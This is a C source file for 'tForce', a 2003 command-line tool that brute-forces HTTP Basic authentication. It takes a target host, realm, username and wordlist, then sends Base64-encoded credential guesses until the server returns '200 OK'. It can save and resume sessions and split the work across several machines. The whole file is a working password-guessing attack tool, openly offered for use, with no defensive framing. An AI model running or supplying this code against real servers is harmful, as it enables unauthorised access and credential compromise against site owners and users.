/**************************************************************************
 * tforce.c                                                               *
 *  _                         _                                           *
 * | |_ ___ _ _ ___ ___ ___ _| |___                                       *
 * |  _|  _| | |   |  _| . | . | -_|                                      *
 * |_| |_| |___|_|_|___|___|___|___|                                      *
 *                                                                        *
 * * truncode security development *                                      *
 * http://www.truncode.org                                                *
 * necrose <necrose@truncode.org>                                         *
 *                                                                        *
 * Copyright (c) 2003, truncode                                           *
 * All rights reserved.                                                   *
 *                                                                        *
 * Redistribution and use in source and binary forms, with or without     * 
 * modification, are permitted provided that the following conditions are *
 * met: * Redistributions of source code must retain the above copyright  *
 *        notice, this list of conditions and the following disclaimer.   *
 *      * Redistributions in binary form must reproduce the above         *
 *        copyright notice, this list of conditions and the following     *
 *        disclaimer in the documentation and/or other materials provided *
 *        with the distribution.                                          *
 *      * Neither the name of the truncode security development nor the   * 
 *        names of its contributors may be used to endorse or promote     *
 *        products derived from this software without specific prior      *
 *        written permission.                                             *
 *                                                                        *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS    *
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT      *
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR  *
 * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT   *
 * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,  *
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT       *
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,  *
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY  *
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT    *
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE  *
 * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.   *
 *                                                                        *
 **************************************************************************/

#include "tforce.h"

/* global version information */
#define TFORCE_VERSION "tForce v1.0.0"
#define TFORCE_AUTHOR "necrose@truncode.org"

int main(int argc, char *argv[]) {
  struct profile p;
  struct session s;
  struct result r;
  int itr_a;

  /* local boolean values */
  char HOST = 0, REALM = 0, USER = 0, LIST = 0;

  memset(&p, 0, sizeof(struct profile));
  memset(&s, 0, sizeof(struct session));
  memset(&r, 0, sizeof(struct session));
  
  /* set default values */
  p.t_port = 80;
  p.c_ret = 5;
  p.s_time = 10;

  /* getopt() replacement */
  for(itr_a = 1; itr_a < argc; itr_a++) {

    /* get target host */
    if(!(strncmp("-h", argv[itr_a], 2)) || !(strncmp("--host", argv[itr_a], 6))) {
      HOST = 1;
      p.t_host = (char *)malloc(strlen(argv[itr_a + 1]));
      strncpy(p.t_host, argv[itr_a + 1], strlen(argv[itr_a + 1]));
      if((rmthost = gethostbyname(p.t_host)) == NULL) {
        fprintf(stderr, "[?] Host not up!?\n"); 
        exit(EXIT_FAILURE);
      }
      strcpy(p.t_addr, inet_ntoa(*((struct in_addr *)rmthost->h_addr)));
    }

    /* get target port */
    if(!(strncmp("-p", argv[itr_a], 2)) || !(strncmp("--port", argv[itr_a], 6))) p.t_port = atoi(argv[itr_a + 1]);

    /* get target realm */
    if(!(strncmp("-r", argv[itr_a], 2)) || !(strncmp("--realm", argv[itr_a], 7))) {
      p.realm = (char *)malloc(strlen(argv[itr_a + 1]));
      strncpy(p.realm, argv[itr_a + 1], strlen(argv[itr_a + 1]));
      REALM = 1;
    }

    /* get target user */
    if(!(strncmp("-u", argv[itr_a], 2)) || !(strncmp("--user", argv[itr_a], 6))) {
      p.u_name = (char *)malloc(strlen(argv[itr_a + 1]));
      strncpy(p.u_name, argv[itr_a + 1], strlen(argv[itr_a + 1]));
      USER = 1;
    }

    /* get wordlist filename */
    if(!(strncmp("-l", argv[itr_a], 2)) || !(strncmp("--list", argv[itr_a], 6))) {
      p.pwd_f = (char *)malloc(strlen(argv[itr_a + 1]));
      strncpy(p.pwd_f, argv[itr_a + 1], strlen(argv[itr_a + 1]));
      LIST = 1;
    }

    /* get number of retries and sleeping time */
    if(!(strncmp("-t", argv[itr_a], 2)) || !(strncmp("--times", argv[itr_a], 7))) p.c_ret = atoi(argv[itr_a + 1]);
    if(!(strncmp("-s", argv[itr_a], 2)) || !(strncmp("--sleep", argv[itr_a], 6))) p.s_time = atoi(argv[itr_a + 1]);

    /* get boolean options */
    if(!(strncmp("-f", argv[itr_a], 2)) || !(strncmp("--forcehost", argv[itr_a], 7))) FORCEHOST = 1;
    if(!(strncmp("-n", argv[itr_a], 2)) || !(strncmp("--nocheck", argv[itr_a], 7))) NOCHECK = 1;
    if(!(strncmp("-v", argv[itr_a], 2)) || !(strncmp("--verbose", argv[itr_a], 9))) VERBOSE = 1;
    if(!(strncmp("-d", argv[itr_a], 2)) || !(strncmp("--debug", argv[itr_a], 7))) DEBUGGING = 1;

    /* get session information */
    if(!(strncmp("--ssnsave", argv[itr_a], 9))) {
      s.ssn_f = (char *)malloc(strlen(argv[itr_a + 1]));
      strncpy(s.ssn_f, argv[itr_a + 1], strlen(argv[itr_a + 1]));
      SSNSAVE = 1;
    }
    if(!(strncmp("--ssnresume", argv[itr_a], 11))) {
      s.rsm_f = (char *)malloc(strlen(argv[itr_a + 1]));
      strncpy(s.rsm_f, argv[itr_a + 1], strlen(argv[itr_a + 1]));
      SSNRESUME = 1;
    }

    /* get distributed mode information */
    if(!(strncmp("--distributed", argv[itr_a], 13))) { 
      s.distbd = atoi(argv[itr_a + 1]);
      DISTRIBUTED = 1;
    }
    if(!(strncmp("--nodeid", argv[itr_a], 8))) { 
      s.nodeid = atoi(argv[itr_a + 1]);
      NODEID = 1;
    }
  }

  /* check for user stupidity */
  if(!SSNRESUME) if((!HOST || !REALM || !USER || !LIST) || (DISTRIBUTED && (!NODEID || !SSNSAVE))) usage(argv);
  if(!SSNRESUME) if((p.t_port < 1) || (p.t_port > 65535)) { 
    fprintf(stderr, "[?] Port out of range, use port 1-65535\n");
    exit(EXIT_FAILURE);
  }
  if(SSNRESUME) if((HOST || REALM || USER || LIST) || (DISTRIBUTED || NODEID)) usage(argv);
  if(DISTRIBUTED && NODEID) {
    if(s.distbd <= 0) { 
      fprintf(stderr, "[?] Negative number of nodes!?\n");
      exit(EXIT_FAILURE);
    }
    if(s.nodeid <= 0 || s.nodeid > s.distbd) {
      fprintf(stderr, "[?] Nodeid out of range!?\n");
      exit(EXIT_FAILURE);
    }
  }

  /* load session resume information */ 
  if(SSNRESUME) {
    if((s.rsm_fp = fopen(s.rsm_f, "r")) == NULL) {
      fprintf(stderr, "[?] Can't open file!?\n");
      exit(EXIT_FAILURE);
    }

    /* allocate memory */
    s.t_host = (char *)malloc(MAXHOSTNAMELEN);
    s.t_addr = (char *)malloc(15);
    s.realm = (char *)malloc(256);
    s.u_name = (char *)malloc(20);
    s.pwd_f = (char *)malloc(256);
    s.pwd_s = (char *)malloc(MAXPASSWORDLEN);

    /* read session information from file */
    fscanf(s.rsm_fp, "%s", s.t_host);
    fscanf(s.rsm_fp, "%s", s.t_addr);
    fscanf(s.rsm_fp, "%d", &s.t_port);
    fscanf(s.rsm_fp, "%s", s.realm);
    fscanf(s.rsm_fp, "%s", s.u_name);
    fscanf(s.rsm_fp, "%s", s.pwd_f);
    fscanf(s.rsm_fp, "%s", s.pwd_s);

    /* close fd */
    fclose(s.rsm_fp);

    /* copy session information into profile structure */
    p.t_host = (char *)malloc(strlen(s.t_host));   
    strncpy(p.t_host, s.t_host, strlen(s.t_host));
    strncpy(p.t_addr, s.t_addr, strlen(s.t_addr));
    p.t_port = s.t_port;
    p.realm = (char *)malloc(strlen(s.realm));
    strncpy(p.realm, s.realm, strlen(s.realm));
    p.u_name = (char *)malloc(strlen(s.u_name));
    strncpy(p.u_name, s.u_name, strlen(s.u_name));
    p.pwd_f = (char *)malloc(strlen(s.pwd_f));
    strncpy(p.pwd_f, s.pwd_f, strlen(s.pwd_f));

    /* free memory */ 
    free(s.t_host);
    free(s.t_addr);
    free(s.realm);
    free(s.u_name);
    free(s.pwd_f);
   }

  if(DISTRIBUTED) {
    s.pwd_s = (char *)malloc(MAXPASSWORDLEN);
    if((s.pwd_fp = fopen(p.pwd_f, "r")) == NULL) {
      fprintf(stderr, "[?] Can't open file!?\n");
      exit(EXIT_FAILURE);
    }
    while(fgets(s.pwd_s, MAXPASSWORDLEN, s.pwd_fp)) s.n_pif++;
    s.n_ppn = (s.n_pif / s.distbd);
    rewind(s.pwd_fp);
    for(s.p_ctr = 0; s.p_ctr < ((s.nodeid * s.n_ppn + 1) - s.n_ppn); s.p_ctr++) fgets(s.pwd_s, MAXPASSWORDLEN, s.pwd_fp);
    fclose(s.pwd_fp);
      
    fprintf(stderr, "[*] Number of passwords  : %ld\n", s.n_pif);
    fprintf(stderr, "[*] Passwords per node   : %ld\n", s.n_ppn);
    fprintf(stderr, "[!] Creating session file: %s\n", s.ssn_f);

    if((s.ssn_fp = fopen(s.ssn_f, "w")) == NULL) {
      fprintf(stderr, "[?] Can't open file!?\n");
      exit(EXIT_FAILURE);
    }

    /* output profile information to session file */
    fprintf(s.ssn_fp, "%s\n", p.t_host);
    fprintf(s.ssn_fp, "%s\n", p.t_addr);
    fprintf(s.ssn_fp, "%d\n", p.t_port);
    fprintf(s.ssn_fp, "%s\n", p.realm);
    fprintf(s.ssn_fp, "%s\n", p.u_name);
    fprintf(s.ssn_fp, "%s\n", p.pwd_f);
    fprintf(s.ssn_fp, "%s\n", s.pwd_s);

    /* close fd */
    fclose(s.ssn_fp);
    free(s.pwd_s);
    exit(EXIT_SUCCESS);
  } 

  /* output the startup information */
  fprintf(stderr, "\nStarting %s // %s\n", TFORCE_VERSION, TFORCE_AUTHOR);
  fprintf(stderr, "[*] HOSTNAME --> %s:%d\n", p.t_host, p.t_port);
  fprintf(stderr, "[*] REALM    --> %s\n", p.realm);

  fprintf(stderr, "[*] USERNAME --> %s\n", p.u_name);
  fprintf(stderr, "[*] WORDLIST --> %s\n", p.pwd_f);
  fprintf(stderr, "[*] RTT/SSEC --> %d times/%d seconds\n", p.c_ret, p.s_time);

  /* validate HTTP realm */
  if(!NOCHECK) {
    fprintf(stderr, "[!] Validating REALM... ");
    if(!chkrealm(&p)) {
      fprintf(stderr, "[?] No REALM!?\n");
      exit(EXIT_FAILURE);
    } else fprintf(stderr, "OK!\n");
  }

  if(SSNSAVE) fprintf(stderr, "[*] SESSION FILE: %s\n", s.ssn_f);
  if(SSNRESUME) fprintf(stderr, "[!] RESUMING SESSION: %s\n", s.rsm_f);

  /* start the brute forcing */
  gettimeofday(&time_bgn, NULL);
  r.v_lgn = httpbf(&p, &s);
  gettimeofday(&time_end, NULL);

  /* compute elapsed time */
  timeval_subtract(&time_psd, &time_end, &(time_bgn));
  r.t_psd = time_psd.tv_sec+(float)time_psd.tv_usec/1000000.0; 

  /* output the final statistics */
  fprintf(stderr, "\n[%%] Summary: (results and statistics)\n");
  fprintf(stderr, "[%%] TOTAL TIME: %.2fs\n", r.t_psd);
  fprintf(stderr, "[%%] PASSWORDS : %ld\n", s.p_ctr);
  fprintf(stderr, "[%%] PWORDS/SEC: %.2fs\n", s.p_ctr / r.t_psd);
  if(r.v_lgn != NULL) fprintf(stderr, "\n[%%] LOGIN: %s\n", r.v_lgn);
    else fprintf(stderr, "\n[%%] LOGIN: --> NO VALID PASSWORD FOUND\n\n");

  exit(EXIT_SUCCESS);
  return 0;
}

/**************************************************************************
 * chkrealm(), validate specified HTTP realm.                             *
 *                                                                        *
 * This function is originally written for librecon of libtrun. This      *
 * function is meant to check if the specified HTTP realm is actually an  * 
 * URL that requires authenication. This is done by analyzing if the      *
 * string: "401 Authorization Required" is present in the HTTP response.  *
 *                                                                        *
 * NOTE: This function has been modified a little.                        *
 **************************************************************************/

int chkrealm(struct profile *p) {
  struct working w;

  memset(&w, 0, sizeof(struct working));

  w.sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

  rmtaddr.sin_family = AF_INET;
  rmtaddr.sin_port = htons(p->t_port);
  rmtaddr.sin_addr.s_addr = inet_addr(p->t_addr);

  if(connect(w.sockfd, (struct sockaddr *)&rmtaddr, sizeof(struct sockaddr)) != 0) { close(w.sockfd); return -1; }

  w.out_s = (char *)malloc(4 + strlen(p->realm) + 11);
  sprintf(w.out_s, "GET %s HTTP/1.0\n\n", p->realm);
  if(send(w.sockfd, w.out_s, strlen(w.out_s), 0) <= 0) { 
    free(w.out_s); 
    close(w.sockfd); 
    return -1; 
  }
  free(w.out_s);

  w.inp_s = (char *)malloc(300);
  if(recv(w.sockfd, w.inp_s, 300, 0) <= 0) { close(w.sockfd); return -1; }
  if(strstr(w.inp_s, "401 Authorization Required") != NULL) {
    free(w.inp_s); 
    close(w.sockfd); 
    return 1; 
  }
  free(w.inp_s);

  close(w.sockfd);
  return 0;
}

/**************************************************************************
 * httpbf(), HTTP realm brute forcing function.                           *
 *                                                                        *
 * This function is originally written for librecon of libtrun. I wrote   *
 * this function using some Base64 code found somewhere on the internet.  *
 * It tries every word from a wordlist as password.                       *
 *                                                                        *
 * NOTE: This function has been modified a little.                        *
 *************************************************************************/

char *httpbf(struct profile *p, struct session *s) {
  struct working w;
  static char basis_64[] =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????";
  const unsigned char *in;
  unsigned char *out;
  unsigned inlen;
  unsigned outmax;
  unsigned *outlen;
  unsigned char oval;
  unsigned olen;

  int yes = 1; /* this is required by setsockopt() */

  memset(&w, 0, sizeof(struct working)); 

  /* open the wordlist file */
  if((w.pwd_fp = fopen(p->pwd_f, "r")) == NULL) {
    fprintf(stderr, "[?] Can't open file!?\n");
    exit(EXIT_FAILURE); 
  }

  /* maximum password length is MAXPASSWORDLEN bytes */
  w.pwd_s = (char *)malloc(MAXPASSWORDLEN);

  s->p_ctr = 0;

  /* the brute forcing loop */
  while(fgets(w.pwd_s, MAXPASSWORDLEN, w.pwd_fp) != NULL) {
    p->p_ctr++;
    s->p_ctr++;

    if(SSNRESUME) {
      while(strncmp(w.pwd_s, s->pwd_s, (strlen(w.pwd_s) - 1))) {
        fgets(w.pwd_s, MAXPASSWORDLEN, w.pwd_fp);
        p->p_ctr++;
      }
      free(s->pwd_s);
      SSNRESUME = 0;
    }

    if(w.t_stat > 4) w.t_stat = 0;
    w.t_stat++;
    twiddle(w.t_stat);

    /* generate the login string */
    w.lgn_s = (char *)malloc(strlen(p->u_name) + 1 + strlen(w.pwd_s));
    sprintf(w.lgn_s, "%s:%s", p->u_name, w.pwd_s);
    w.enc_s = (char *)malloc(strlen(w.lgn_s) * sizeof(int));

    /* Base64 encode the login string */
    in = (const unsigned char *)w.lgn_s;
    out = (unsigned char *)w.enc_s;
    inlen = strlen(w.lgn_s);
    outmax = strlen(w.lgn_s) * sizeof(int);
    outlen = &w.enc_l;

    olen = (inlen + 2) / 3 * 4;
    if(outlen) *outlen = olen;

    while (inlen >= 3) {
      *out++ = basis_64[in[0] >> 2];
      *out++ = basis_64[((in[0] << 4) & 0x30) | (in[1] >> 4)];
      *out++ = basis_64[((in[1] << 2) & 0x3c) | (in[2] >> 6)];
      *out++ = basis_64[in[2] & 0x3f];
      in += 3;
      inlen -= 3;
    }
    if (inlen > 0) {
      *out++ = basis_64[in[0] >> 2];
      oval = (in[0] << 4) & 0x30;
      if (inlen > 1) oval |= in[1] >> 4;
      *out++ = basis_64[oval];
      *out++ = (inlen < 2) ? '=' : basis_64[(in[1] << 2) & 0x3c];
      *out++ = '=';
    }
    if(olen < outmax) *out = '\0';

    w.sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(w.sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));

    rmtaddr.sin_family = AF_INET;
    rmtaddr.sin_port = htons(p->t_port);
    rmtaddr.sin_addr.s_addr = inet_addr(p->t_addr);

    /**********************************************************************
     * This try's p->c_ret times to reconnect, if the connection fails.   *
     * Sleeping p->s_time between every connection retry.                 *
     **********************************************************************/
    w.c_ctr = 1;
    while(connect(w.sockfd, (struct sockaddr *)&rmtaddr, sizeof(struct sockaddr)) != 0) {
      twiddle(0);
      fprintf(stderr, "\n[!] --> CONNECTION FAILED: SLEEPING FOR %d SECONDS...\n\n", p->s_time);
      sleep(p->s_time);
      if(w.c_ctr == p->c_ret) {
        close(w.sockfd);
        fprintf(stderr, "[?] Can't connect to target host!?\n");
        exit(EXIT_FAILURE);
      }
      w.c_ctr++;
    }

    /* request the HTTP realm */
    w.out_s = (char *)malloc(4 + strlen(p->realm) + 10);
    sprintf(w.out_s, "GET %s HTTP/1.0\n", p->realm);
    send(w.sockfd, w.out_s, strlen(w.out_s), 0);
    free(w.out_s);

    /* force the hostname, if this option is enabled */ 
    if(FORCEHOST) {    
      w.out_s = (char *)malloc(6 + strlen(p->t_host) + 1);
      sprintf(w.out_s, "Host: %s\n", p->t_host);
      send(w.sockfd, w.out_s, strlen(w.out_s), 0);
      free(w.out_s);
    }

    if(DEBUGGING)
      fprintf(stderr, "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n");

    if(VERBOSE || DEBUGGING) { 
      fprintf(stderr, "[!] Trying(%ld): (%s) -> %s", p->p_ctr, w.enc_s, w.lgn_s); }

    if(DEBUGGING)
      fprintf(stderr, "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n");

    /* authenicate with the encoded login string */
    w.out_s = (char *)malloc(21 + strlen(w.enc_s) + 2);
    sprintf(w.out_s, "Authorization: Basic %s\n\n", w.enc_s);
    send(w.sockfd, w.out_s, strlen(w.out_s), 0);
    free(w.out_s);
 
    /* receive server response */
    w.inp_s = (char *)malloc(300);
    recv(w.sockfd, w.inp_s, 300, 0);
    if(DEBUGGING) { 
      fprintf(stderr, "%s\n", w.inp_s); 
      fprintf(stderr, "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n\n");
    }
    if(strstr(w.inp_s, "200 OK") != NULL) break;
    free(w.inp_s);

    if(SSNSAVE) {
      if((s->ssn_fp = fopen(s->ssn_f, "w")) == NULL) {
        fprintf(stderr, "[?] Can't open file!?\n");
        exit(EXIT_FAILURE);
      }

      /* output profile information to session file */
      fprintf(s->ssn_fp, "%s\n", p->t_host);
      fprintf(s->ssn_fp, "%s\n", p->t_addr);
      fprintf(s->ssn_fp, "%d\n", p->t_port);
      fprintf(s->ssn_fp, "%s\n", p->realm);
      fprintf(s->ssn_fp, "%s\n", p->u_name);
      fprintf(s->ssn_fp, "%s\n", p->pwd_f);
      fprintf(s->ssn_fp, "%s\n", w.pwd_s);
 
      /* close fd */
      fclose(s->ssn_fp);
    }

    memset(w.pwd_s, 0, MAXPASSWORDLEN);

    /* clean up */
    free(w.enc_s);
    free(w.lgn_s);

    /* set string pointers to NULL */
    w.enc_s = NULL;
    w.lgn_s = NULL;

    /* close socket fd */
    close(w.sockfd);
  }

  twiddle(0);

  /* close fd's */  
  close(w.sockfd);
  fclose(w.pwd_fp);

  /* free memory */
  free(w.pwd_s);
  free(w.enc_s);

  return w.lgn_s;
}

/**************************************************************************
 * timeval_subtract(), computes elapsed time. (from gnu c-lib info.texi). *
 *                                                                        *
 * This function computes the elapsed time from the beginning of the      *
 * wordlist until either the end of the password list or until a working  *
 * password is found in the specified wordlist.                           *
 *                                                                        *
 * NOTE: This function has been modified a little.                        *
 **************************************************************************/

int timeval_subtract (struct timeval *result, struct timeval *x, struct timeval *y) {
  /* Perform the carry for the later subtraction by updating y. */
  if (x->tv_usec < y->tv_usec) {
    int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1;
    y->tv_usec -= 1000000 * nsec;
    y->tv_sec += nsec;
  }
  if (x->tv_usec - y->tv_usec > 1000000) {
    int nsec = (y->tv_usec - x->tv_usec) / 1000000;
    y->tv_usec += 1000000 * nsec;
    y->tv_sec -= nsec;
  }

  /* Compute the time remaining to wait.
    `tv_usec' is certainly positive. */
  result->tv_sec = x->tv_sec - y->tv_sec;
  result->tv_usec = x->tv_usec - y->tv_usec;

  /* Return 1 if result is negative. */
  return x->tv_sec < y->tv_sec;
}

/* this indicates the program is still active */
/* this function twiddles, don't you just LOVE IT!? :-) */
void twiddle(u_short t_stat) {
  switch(t_stat) {
    case 0:
      fprintf(stderr, " \r"); fflush(stderr);
      break;
    case 1:
      fprintf(stderr, "|\r"); fflush(stderr);
      break;
    case 2:
      fprintf(stderr, "/\r"); fflush(stderr);
      break;
    case 3:
      fprintf(stderr, "-\r"); fflush(stderr);
      break;
    case 4:
      fprintf(stderr, "\\\r"); fflush(stderr);
      break;
  }
  return;
}

/* output the usage information *RTFM* */
void usage(char *argv[]) {
fprintf(stderr, "%s // %s Usage: %s\n"
"[--host <host> --port <port> --realm <realm> --user <user> --list <file> ]\n"
"[--forcehost --time <times> --sleep <seconds> --nocheck --verbose --debug]\n"
"[--ssnsave <file> --ssnresume <file> --distributed <nodes> --nodeid <id> ]\n"
"(Options preceding a * are required options)\n"
"* -h, --host, connect directly to webserver <host> or proxy server <host>\n"
"  -f, --forcehost, forces Host: <host> (on servers with multiple domains)\n"
"  -p, --port, connect to <port> on the target host (default: 80)\n"
"  -t, --times, reconnects <times> before program fails (default: 5 times)\n"
"  -s, --sleep, sleep <seconds> before retrying (default: 10 seconds)\n"
"* -r, --realm, HTTP <realm> to attack (Example: http://www.tc.com/realm/)\n"
"  -n, --nocheck, disable HTTP realm validation\n"
"* -u, --user, use <user> as the username to login to the HTTP realm\n"
"* -l, --list, use <file> as password list (plain ASCII text file required)\n"
"  -v, --verbose, enable verbose mode, keep track of current password\n"
"  -d, --debug, enable debugging mode, verbose and HTTP response output\n"
"(Options related to session management and distributed mode)\n"
"  --ssnsave, save session to session <file>\n"
"  --ssnresume, resume session using session <file>\n"
"  --distributed, enables distributed mode, with <nodes> systems\n"
"  --nodeid, creates session file for system's <id> in distributed mode\n"
"(Example: ./tforce -h tc.com -p 80 -r http://www.tc.com/rlm/ -u un -l pl)\n"
"See [http://www.truncode.org] for more information\n", TFORCE_VERSION, TFORCE_AUTHOR, argv[0]);
  exit(EXIT_SUCCESS);
  return;
}
